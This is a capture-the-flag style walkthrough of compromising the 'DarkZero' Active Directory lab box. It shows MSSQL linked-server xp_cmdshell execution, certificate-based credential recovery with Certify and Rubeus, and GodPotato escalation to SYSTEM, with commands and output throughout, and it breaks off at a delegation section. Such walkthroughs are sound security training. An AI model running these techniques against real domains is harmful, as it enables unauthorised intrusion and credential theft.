DarkZero
by 0xW1LD
Enumeration
As is common in real life pentests, you will start the DarkZero box with credentials for the following account john.w / RFulUtONCOL!
Scans
As usual we start off with an nmap port scan.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
2179/tcp open vmrdp
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49668/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49908/tcp open unknown
58371/tcp open unknown
60946/tcp open unknown
Looks like we have the usual Active Directory ports up, 53 - DNS, 88 - Kerberos, 135 - SMB, 139 - SMB/NB, 389 - LDAP, 445 - SMB
Some interesting ports that aren’t usual include:
1
2
1433 - MSSQL # Not usual for an AD box but has a couple of possible vulnerabilities from xp_cmd to xp_dirtree
2179 - VMRDP # Virtualized DC?
Let’s do a quick check on what SMB shares we have access to.
1
2
3
4
5
6
7
8
9
10
11
$ nxc smb $T -u $USER -p $PASS --shares
SMB 10.129.242.233 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB 10.129.242.233 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
SMB 10.129.242.233 445 DC01 [*] Enumerated shares
SMB 10.129.242.233 445 DC01 Share Permissions Remark
SMB 10.129.242.233 445 DC01 ----- ----------- ------
SMB 10.129.242.233 445 DC01 ADMIN$ Remote Admin
SMB 10.129.242.233 445 DC01 C$ Default share
SMB 10.129.242.233 445 DC01 IPC$ READ Remote IPC
SMB 10.129.242.233 445 DC01 NETLOGON READ Logon server share
SMB 10.129.242.233 445 DC01 SYSVOL READ Logon server share
Looks like there are no interesting shares, however most notable thing here is that it’s a Windows Server 2025 operating system which means it’s rather new and fully patched against a lot of exploits.
One of the first things I check for is local authentication, just to check if we also have a local account in addition to our domain account.
1
2
3
$ nxc ldap $T -u $USER -p $PASS --local-auth
LDAP 10.129.242.233 389 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
LDAPS 10.129.242.233 636 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
Looks like we do have a local user account on the DC01, let’s note this down for later.
Let’s check for our direct write ACLs using bloodyAD.
1
2
3
4
5
6
7
$ bloodyAD -d $D --host $T -u $USER -p $PASS get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=darkzero,DC=htb
permission: WRITE
distinguishedName: CN=john.w,CN=Users,DC=darkzero,DC=htb
permission: WRITE
Although it may seem like we have a write on ForeignSecurityPrincipals, this would only be useful if we already had access to another forest, which we don’t.
Let’s check out what users we can find in the domain.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ bloodyAD -d $D --host $T -u $USER -p $PASS get search --filter "(objectClass=user)" --attr SamAccountName
distinguishedName: CN=Administrator,CN=Users,DC=darkzero,DC=htb
sAMAccountName: Administrator
distinguishedName: CN=Guest,CN=Users,DC=darkzero,DC=htb
sAMAccountName: Guest
distinguishedName: CN=DC01,OU=Domain Controllers,DC=darkzero,DC=htb
sAMAccountName: DC01$
distinguishedName: CN=krbtgt,CN=Users,DC=darkzero,DC=htb
sAMAccountName: krbtgt
distinguishedName: CN=darkzero-ext$,CN=Users,DC=darkzero,DC=htb
sAMAccountName: darkzero-ext$
distinguishedName: CN=john.w,CN=Users,DC=darkzero,DC=htb
sAMAccountName: john.w
Looks like, in addition to the standard Administrator, Guest, and DC machine accounts, there’s an additional machine account. Let’s check for ServicePrincipalNames
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ bloodyAD -d $D --host $T -u $USER -p $PASS get search --filter "(objectClass=user)" --attr servicePrincipalName
distinguishedName: CN=Administrator,CN=Users,DC=darkzero,DC=htb
distinguishedName: CN=Guest,CN=Users,DC=darkzero,DC=htb
distinguishedName: CN=DC01,OU=Domain Controllers,DC=darkzero,DC=htb
servicePrincipalName: Hyper-V Replica Service/DC01; Hyper-V Replica Service/DC01.darkzero.htb; Microsoft Virtual System Migration Service/DC01; Microsoft Virtual System Migration Service/DC01.darkzero.htb; Microsoft Virtual Console Service/DC01; Microsoft Virtual Console Service/DC01.darkzero.htb; Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC01.darkzero.htb; ldap/DC01.darkzero.htb/ForestDnsZones.darkzero.htb; ldap/DC01.darkzero.htb/DomainDnsZones.darkzero.htb; DNS/DC01.darkzero.htb; GC/DC01.darkzero.htb/darkzero.htb; RestrictedKrbHost/DC01.darkzero.htb; RestrictedKrbHost/DC01; RPC/e78dbc40-94c4-44f5-8ee6-f8bb6b21f3dd._msdcs.darkzero.htb; HOST/DC01/darkzero; HOST/DC01.darkzero.htb/darkzero; HOST/DC01; HOST/DC01.darkzero.htb; HOST/DC01.darkzero.htb/darkzero.htb; E3514235-4B06-11D1-AB04-00C04FC2DCD2/e78dbc40-94c4-44f5-8ee6-f8bb6b21f3dd/darkzero.htb; ldap/DC01/darkzero; ldap/e78dbc40-94c4-44f5-8ee6-f8bb6b21f3dd._msdcs.darkzero.htb; ldap/DC01.darkzero.htb/darkzero; ldap/DC01; ldap/DC01.darkzero.htb; ldap/DC01.darkzero.htb/darkzero.htb
distinguishedName: CN=krbtgt,CN=Users,DC=darkzero,DC=htb
servicePrincipalName: kadmin/changepw
distinguishedName: CN=darkzero-ext$,CN=Users,DC=darkzero,DC=htb
distinguishedName: CN=john.w,CN=Users,DC=darkzero,DC=htb
As usual the DC contains a lot of SPNs, most interesting one to note is the kadmin/changepw on the krbtgt account.
Attempting to grab a TGS for the krbtgt account, we notice that it’s in fact disabled.
1
2
3
4
5
$ nxc ldap $T -u $USER -p $PASS --kerberoasting krbroast.txt
LDAP 10.129.242.233 389 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01)
LDAPS 10.129.242.233 636 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
LDAPS 10.129.242.233 636 DC01 [*] Skipping disabled account: krbtgt
LDAPS 10.129.242.233 636 DC01 [*] Total of records returned 0
Let’s check for which users are members of which groups.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ bloodyAD -d $D --host $T -u $USER -p $PASS get search --filter "(objectClass=user)" --attr memberOf
distinguishedName: CN=Administrator,CN=Users,DC=darkzero,DC=htb
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=darkzero,DC=htb; CN=Domain Admins,CN=Users,DC=darkzero,DC=htb; CN=Enterprise Admins,CN=Users,DC=darkzero,DC=htb; CN=Schema Admins,CN=Users,DC=darkzero,DC=htb; CN=Administrators,CN=Builtin,DC=darkzero,DC=htb
distinguishedName: CN=Guest,CN=Users,DC=darkzero,DC=htb
memberOf: CN=Guests,CN=Builtin,DC=darkzero,DC=htb
distinguishedName: CN=DC01,OU=Domain Controllers,DC=darkzero,DC=htb
memberOf: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=darkzero,DC=htb; CN=Cert Publishers,CN=Users,DC=darkzero,DC=htb
distinguishedName: CN=krbtgt,CN=Users,DC=darkzero,DC=htb
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=darkzero,DC=htb
distinguishedName: CN=darkzero-ext$,CN=Users,DC=darkzero,DC=htb
distinguishedName: CN=john.w,CN=Users,DC=darkzero,DC=htb
Now let’s do the same enumeration for computers on the domain.
1
2
3
4
5
6
$ bloodyAD -d $D --host $T -u $USER -p $PASS get search --filter "(objectClass=computer)" --attr sAMAccountName,memberOf,servicePrincipalName
distinguishedName: CN=DC01,OU=Domain Controllers,DC=darkzero,DC=htb
memberOf: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=darkzero,DC=htb; CN=Cert Publishers,CN=Users,DC=darkzero,DC=htb
sAMAccountName: DC01$
servicePrincipalName: Hyper-V Replica Service/DC01; Hyper-V Replica Service/DC01.darkzero.htb; Microsoft Virtual System Migration Service/DC01; Microsoft Virtual System Migration Service/DC01.darkzero.htb; Microsoft Virtual Console Service/DC01; Microsoft Virtual Console Service/DC01.darkzero.htb; Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC01.darkzero.htb; ldap/DC01.darkzero.htb/ForestDnsZones.darkzero.htb; ldap/DC01.darkzero.htb/DomainDnsZones.darkzero.htb; DNS/DC01.darkzero.htb; GC/DC01.darkzero.htb/darkzero.htb; RestrictedKrbHost/DC01.darkzero.htb; RestrictedKrbHost/DC01; RPC/e78dbc40-94c4-44f5-8ee6-f8bb6b21f3dd._msdcs.darkzero.htb; HOST/DC01/darkzero; HOST/DC01.darkzero.htb/darkzero; HOST/DC01; HOST/DC01.darkzero.htb; HOST/DC01.darkzero.htb/darkzero.htb; E3514235-4B06-11D1-AB04-00C04FC2DCD2/e78dbc40-94c4-44f5-8ee6-f8bb6b21f3dd/darkzero.htb; ldap/DC01/darkzero; ldap/e78dbc40-94c4-44f5-8ee6-f8bb6b21f3dd._msdcs.darkzero.htb; ldap/DC01.darkzero.htb/darkzero; ldap/DC01; ldap/DC01.darkzero.htb; ldap/DC01.darkzero.htb/darkzero.htb
Let’s check out non-standard groups.
1
2
3
4
5
6
7
$ bloodyAD -d $D --host $T -u $USER -p $PASS get search --filter "(&(objectClass=group)(!(isCriticalSystemObject=TRUE)))" --attr distignuishedName
distinguishedName: CN=DnsAdmins,CN=Users,DC=darkzero,DC=htb
distinguishedName: CN=DnsUpdateProxy,CN=Users,DC=darkzero,DC=htb
distinguishedName: CN=SQLServer2005SQLBrowserUser$DC01,CN=Users,DC=darkzero,DC=htb
The most interesting one is probably the SQLServer2005SQLBrowserUser group. Let’s take a closer look at this object.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
$ bloodyAD -d $D --host $T -u $USER -p $PASS get object 'SQLServer2005SQLBrowserUser$DC01' --resolve-sd
distinguishedName: CN=SQLServer2005SQLBrowserUser$DC01,CN=Users,DC=darkzero,DC=htb
cn: SQLServer2005SQLBrowserUser$DC01
dSCorePropagationData: 1601-01-01 00:00:00+00:00
description: Members in the group have the required access and privileges to be assigned as the log on account for the associated instance of SQL Server Browser.
groupType: -2147483644
instanceType: 4
nTSecurityDescriptor.Owner: Domain Admins
nTSecurityDescriptor.Control: DACL_AUTO_INHERITED|DACL_PRESENT|SACL_AUTO_INHERITED|SELF_RELATIVE
nTSecurityDescriptor.ACL.0.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.0.Trustee: WINDOWS_AUTHORIZATION_ACCESS_GROUP
nTSecurityDescriptor.ACL.0.Right: READ_PROP
nTSecurityDescriptor.ACL.0.ObjectType: Token-Groups-Global-And-Universal
nTSecurityDescriptor.ACL.1.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.1.Trustee: AUTHENTICATED_USERS
nTSecurityDescriptor.ACL.1.Right: CONTROL_ACCESS
nTSecurityDescriptor.ACL.1.ObjectType: Send-To
nTSecurityDescriptor.ACL.2.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.2.Trustee: Domain Admins; ACCOUNT_OPERATORS; LOCAL_SYSTEM
nTSecurityDescriptor.ACL.2.Right: GENERIC_ALL
nTSecurityDescriptor.ACL.2.ObjectType: Self
nTSecurityDescriptor.ACL.3.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.3.Trustee: PRINCIPAL_SELF; AUTHENTICATED_USERS
nTSecurityDescriptor.ACL.3.Right: GENERIC_READ
nTSecurityDescriptor.ACL.3.ObjectType: Self
nTSecurityDescriptor.ACL.4.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.4.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.4.Right: READ_PROP
nTSecurityDescriptor.ACL.4.ObjectType: Remote-Access-Information (property set); Group-Membership (property set); Logon-Information (property set); Account-Restrictions (property set); General-Information (property set)
nTSecurityDescriptor.ACL.4.InheritedObjectType: User; inetOrgPerson
nTSecurityDescriptor.ACL.4.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.5.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.5.Trustee: Enterprise Key Admins; Key Admins
nTSecurityDescriptor.ACL.5.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.5.ObjectType: ms-DS-Key-Credential-Link
nTSecurityDescriptor.ACL.5.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.6.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.6.Trustee: PRINCIPAL_SELF; CREATOR_OWNER
nTSecurityDescriptor.ACL.6.Right: WRITE_VALIDATED
nTSecurityDescriptor.ACL.6.ObjectType: DS-Validated-Write-Computer
nTSecurityDescriptor.ACL.6.InheritedObjectType: Computer
nTSecurityDescriptor.ACL.6.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.7.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.7.Trustee: ENTERPRISE_DOMAIN_CONTROLLERS
nTSecurityDescriptor.ACL.7.Right: READ_PROP
nTSecurityDescriptor.ACL.7.ObjectType: Token-Groups
nTSecurityDescriptor.ACL.7.InheritedObjectType: Computer; User
nTSecurityDescriptor.ACL.7.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.8.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.8.Trustee: ENTERPRISE_DOMAIN_CONTROLLERS
nTSecurityDescriptor.ACL.8.Right: READ_PROP
nTSecurityDescriptor.ACL.8.ObjectType: Token-Groups
nTSecurityDescriptor.ACL.8.InheritedObjectType: Group
nTSecurityDescriptor.ACL.8.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.9.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.9.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.9.Right: WRITE_PROP
nTSecurityDescriptor.ACL.9.ObjectType: ms-TPM-Tpm-Information-For-Computer
nTSecurityDescriptor.ACL.9.InheritedObjectType: Computer
nTSecurityDescriptor.ACL.9.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.10.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.10.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.10.Right: GENERIC_READ
nTSecurityDescriptor.ACL.10.ObjectType: Self
nTSecurityDescriptor.ACL.10.InheritedObjectType: User; inetOrgPerson
nTSecurityDescriptor.ACL.10.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.11.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.11.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.11.Right: GENERIC_READ
nTSecurityDescriptor.ACL.11.ObjectType: Self
nTSecurityDescriptor.ACL.11.InheritedObjectType: Group
nTSecurityDescriptor.ACL.11.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.12.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.12.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.12.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.12.ObjectType: ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
nTSecurityDescriptor.ACL.12.Flags: CONTAINER_INHERIT; INHERITED; OBJECT_INHERIT
nTSecurityDescriptor.ACL.13.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.13.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.13.Right: CONTROL_ACCESS|WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.13.ObjectType: Private-Information (property set)
nTSecurityDescriptor.ACL.13.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.14.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.14.Trustee: Enterprise Admins
nTSecurityDescriptor.ACL.14.Right: GENERIC_ALL
nTSecurityDescriptor.ACL.14.ObjectType: Self
nTSecurityDescriptor.ACL.14.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.15.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.15.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.15.Right: LIST_CHILD
nTSecurityDescriptor.ACL.15.ObjectType: Self
nTSecurityDescriptor.ACL.15.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.16.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.16.Trustee: BUILTIN_ADMINISTRATORS
nTSecurityDescriptor.ACL.16.Right: WRITE_OWNER|WRITE_DACL|GENERIC_READ|DELETE|CONTROL_ACCESS|WRITE_PROP|WRITE_VALIDATED|CREATE_CHILD
nTSecurityDescriptor.ACL.16.ObjectType: Self
nTSecurityDescriptor.ACL.16.Flags: CONTAINER_INHERIT; INHERITED
name: SQLServer2005SQLBrowserUser$DC01
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=darkzero,DC=htb
objectClass: top; group
objectGUID: 68f18300-4c1b-4e85-aab0-825e2b8da318
objectSid: S-1-5-21-1152179935-589108180-1989892463-2601
sAMAccountName: SQLServer2005SQLBrowserUser$DC01
sAMAccountType: 536870912
uSNChanged: 45113
uSNCreated: 45110
whenChanged: 2025-07-29 15:11:45+00:00
whenCreated: 2025-07-29 15:11:45+00:00
We can find a bunch of inherited standard Security Descriptors, however it’s worth noting that if we do get membership to this group there is a possibility of RBCD within it.
1
2
3
4
nTSecurityDescriptor.ACL.12.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.12.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.12.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.12.ObjectType: ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
Let’s check out mssql using netexec.
1
2
3
$ nxc mssql $D -u $USER -p $PASS
MSSQL 10.129.242.233 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.242.233 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
Looks like we have access, let’s enumerate
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ nxc mssql $D -u $USER -p $PASS -M enum_impersonate
MSSQL 10.129.242.233 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.242.233 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
ENUM_IMP... 10.129.242.233 1433 DC01 [-] No users with impersonation rights found.
$ nxc mssql $D -u $USER -p $PASS -M enum_logins
MSSQL 10.129.242.233 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.242.233 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
ENUM_LOGINS 10.129.242.233 1433 DC01 [+] Logins found:
ENUM_LOGINS 10.129.242.233 1433 DC01 [*] - sa
$ nxc mssql $D -u $USER -p $PASS -M enum_links
MSSQL 10.129.242.233 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.242.233 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
ENUM_LINKS 10.129.242.233 1433 DC01 [+] Linked servers found:
ENUM_LINKS 10.129.242.233 1433 DC01 [*] - DC01
ENUM_LINKS 10.129.242.233 1433 DC01 [*] - DC02.darkzero.ext
We found online user: sa and a link server: DC02.darkzero.ext
Foothold
Let’s attempt to enable xp_cmdshell on the link servers.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ nxc mssql $D -u $USER -p $PASS -M link_enable_xp -o LINKED_SERVER=DC01
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
MSSQL 10.129.242.233 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.242.233 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
LINK_ENA... 10.129.242.233 1433 DC01 [*] Enabling advanced options on DC01...
LINK_ENA... 10.129.242.233 1433 DC01 [*] Enabling xp_cmdshell on DC01...
LINK_ENA... 10.129.242.233 1433 DC01 [*] []
LINK_ENA... 10.129.242.233 1433 DC01 [+] xp_cmdshell enabled on DC01
$ nxc mssql $D -u $USER -p $PASS -M link_enable_xp -o LINKED_SERVER=DC02.darkzero.ext
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
MSSQL 10.129.242.233 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.242.233 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
LINK_ENA... 10.129.242.233 1433 DC01 [*] Enabling advanced options on DC02.darkzero.ext...
LINK_ENA... 10.129.242.233 1433 DC01 [*] Enabling xp_cmdshell on DC02.darkzero.ext...
LINK_ENA... 10.129.242.233 1433 DC01 [*] []
LINK_ENA... 10.129.242.233 1433 DC01 [+] xp_cmdshell enabled on DC02.darkzero.ext
Success! Let’s now check if we can run commands on these links.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ nxc mssql $D -u $USER -p $PASS -M link_xpcmd -o LINKED_SERVER=DC01 CMD="whoami"
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
MSSQL 10.129.242.233 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.242.233 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
LINK_XPCMD 10.129.242.233 1433 DC01 [*] Running command on DC01: whoami
LINK_XPCMD 10.129.242.233 1433 DC01 [+] Command output:
[]
$ nxc mssql $D -u $USER -p $PASS -M link_xpcmd -o LINKED_SERVER=DC02.darkzero.ext CMD="whoami"
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
MSSQL 10.129.242.233 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.242.233 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
LINK_XPCMD 10.129.242.233 1433 DC01 [*] Running command on DC02.darkzero.ext: whoami
LINK_XPCMD 10.129.242.233 1433 DC01 [+] Command output:
[{'output': 'darkzero-ext\\svc_sql'}, {'output': 'NULL'}]
Looks like we have command execution on DC02.darkzero.ext using this I grab a shell using a reverse shell.
1
2
3
4
5
6
7
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> whoami
darkzero-ext\svc_sql
User
Post-Exploitation Enumeration
Looking around, the strangest thing we notice is that our NT AUTHORITY\MSSQLSERVER account has a strange lack of permissions. We can compare the current permissions to the ones mentioned in Configure Windows Service Account and Permissions
1
2
3
4
5
6
7
8
9
10
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
We notice that we don’t have the following permissions that should’ve been granted by SQL server setup.
SeServiceLogonRightSeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilege
UnPAC the Hash
The next steps would be much easier if we could authenticate to the DC02.darkzero.ext domain with credentials. So let’s grab them using an UnPAC the Hash attack. Transferring Certify.exe I request for a certificate.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
PS C:\w1ld> .\Certify.exe request /ca:DC02.darkzero.ext\darkzero-ext-dc02-CA /template:User
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Certificate Authority : DC02.darkzero.ext\darkzero-ext-dc02-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 3
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
<SNIP>
I transfer the output cert.pem file to my attacker machine and convert it to a pfx file, without specifying a password.
1
2
3
$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
After which I transfer back the pfx file to the machine and request for credentials using Rubeus
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
PS C:\w1ld> .\Rubeus.exe asktgt /user:svc_sql /certificate:C:\W1ld\cert.pfx /getcredentials /show /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.2
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=svc_sql, CN=Users, DC=darkzero, DC=ext
[*] Building AS-REQ (w/ PKINIT preauth) for: 'darkzero.ext\svc_sql'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
<SNIP>
We’ve successfully recovered credentials for the current user!
You can also do this from the attacker machine directly using
PKINITtools. I just used the compromised windows machine as I already hadRubeuson it while doing some enumeration.
Recovering Privileges
Now I want to try to run commands as the service, for this we can use RunasCS.exe with the logon-type of 5, which requires a password. Luckily we should be able to change our password now with our credentials.
1
2
3
4
5
6
7
8
$ changepasswd.py darkzero.ext/svc_sql@dc02.darkzero.ext -newpass 'Password123!' -hashes ":[REDACTED]"
/home/kali/.local/share/uv/tools/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of darkzero.ext\svc_sql
[*] Connecting to DCE/RPC as darkzero.ext\svc_sql
[*] Password was changed successfully.
Now let’s check for if we have recovered the permissions.
1
2
3
4
5
6
7
8
9
10
11
12
13
PS C:\w1ld> .\RunasCs.exe svc_sql Password123! -l 5 -b "whoami /priv"
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Use your
reverse_shellof choice, note that powershell breaks when you use powershell reverseshells so you might want to runpowershell.exedirectly and then pipe in the commands.
Now that we have SeImpersonatePrivilege let’s transfer over GodPotato and check out our privileges.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
C:\w1ld>GodPotato-NET4.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140710263848960
[*] DispatchTable: 0x140710266435912
[*] UseProtseqFunction: 0x140710265731248
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\9f2853ec-b87e-4d08-98c1-2bee824c5e98\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00009002-0280-ffff-5fba-6508753f7848
[*] DCOM obj OXID: 0xeff84b6fe3fb4ed8
[*] DCOM obj OID: 0x84822c2935658eaf
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 996 Token:0x736 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3800
nt authority\system
Grab a reverse shell and check out the Administrator/Desktop folder for the user flag.
1
2
3
4
5
6
7
8
9
10
PS C:\users\Administrator\Desktop> ls -force
Directory: C:\users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 7/29/2025 5:58 AM 282 desktop.ini
-a---- 10/6/2025 2:57 AM 34 user.txt
Just like that, we have User!
Root
Post-Exploitation Enumeration
Let’s take a look at the trust relationship between these two domains.
1
2
3
bloodyAD -d $D --host dc01.darkzero.htb -u $USER -p $PASS get trusts
darkzero.htb
+-- <FOREST_TRANSITIVE|CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION|AD>:darkzero.ext
We can find that we have a cross organization TGT delegation permission on the trust.
Unconstrained Delegation
